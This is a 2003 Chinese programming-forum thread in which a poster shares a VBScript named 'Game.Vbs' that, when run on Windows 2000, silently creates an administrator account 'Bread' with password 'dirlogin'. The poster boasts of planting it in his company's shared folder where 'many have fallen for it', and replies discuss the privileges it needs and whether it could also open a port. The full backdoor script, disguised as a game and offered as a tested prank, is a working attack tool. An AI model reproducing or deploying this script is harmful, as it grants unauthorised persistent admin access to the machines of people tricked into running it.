让我偷偷进入你的计算机~~

lovingkiss 2003-07-04 10:48:59
[文件:Game.Vbs]

On Error Resume Next

Dim CurDomain,CurGroup,CurUser
Dim CurMACHINE,CurShell

Set CurShell = WScript.CreateObject("WScript.Shell")
CurMACHINE=CurShell.RegRead("HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ComputerName\ComputerName")
Set CurDomain = GetObject("WinNT://" & CurMACHINE)
Set CurGroup = CurDomain.GetObject("Group", "Administrators")
Set CurUser = CurDomain.Create("user", "Bread")

If (Err.Number = 0) Then '如果已经存在啦
CurUser.SetInfo
CurUser.SetPassword "dirlogin"
CurUser.SetInfo
CurUser.FullName="蒋玉龙专用帐号"
CurUser.SetInfo
CurGroup.Add "WinNT://" & CurMACHINE & "/Bread"
Set CurUser = Nothing
Set CurGroup = Nothing
End If

Set CurDomain = Nothing

'不提供破坏功能,嘿嘿,至于对方会不会点你的文件,就和我没有关系啦,嘿嘿~~
...全文
30 15 打赏 收藏 转发到动态 举报
写回复
用AI写文章
15 条回复
切换为时间正序
请发表友善的回复…
发表回复
baggio785 2003-07-04
  • 打赏
  • 举报
回复
能不能在客户端运行,我不知道,但是在服务器端是可以的,前提是IIS要把用户级别调整到administrato
weixiao51 2003-07-04
  • 打赏
  • 举报
回复
这是windows2000的bug吗?
要是打了sp还管用吗?
baggio785 2003-07-04
  • 打赏
  • 举报
回复
运用的是活动目录
isonme 2003-07-04
  • 打赏
  • 举报
回复
up
baggio785 2003-07-04
  • 打赏
  • 举报
回复
这个要IIS要把用户级别调整到administrator,IUSER不行的
wgd 2003-07-04
  • 打赏
  • 举报
回复
关注
lovingkiss 2003-07-04
  • 打赏
  • 举报
回复
瞎扯,怎么不好用??我的代码都是测试过的
lovingkiss 2003-07-04
  • 打赏
  • 举报
回复
瞎扯,怎么不好用??我的代码都是测试过的
ybbqy 2003-07-04
  • 打赏
  • 举报
回复
不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!不好使!
ybbqy 2003-07-04
  • 打赏
  • 举报
回复
能不能自动开启1394端口呢?
lovingkiss 2003-07-04
  • 打赏
  • 举报
回复
功能:在对方Win2k的机器上建立一个administrators组的Bread用户~~,密码为dirlogin
Jaron 2003-07-04
  • 打赏
  • 举报
回复
好用。
紫郢剑侠 2003-07-04
  • 打赏
  • 举报
回复
gz
收藏研究
lovingkiss 2003-07-04
  • 打赏
  • 举报
回复
1、我这个只是个VBS文件,没有说要到网络上使用的~~
2、我只是放在了我们企业的共享目录里,目前上当者众多~~
3、只是开玩笑的,嘿嘿~~
julyclyde 2003-07-04
  • 打赏
  • 举报
回复
有前提的代码都是没有前途的

28,391

社区成员

发帖
与我相关
我的任务
社区描述
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
社区管理员
  • ASP
  • 无·法
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧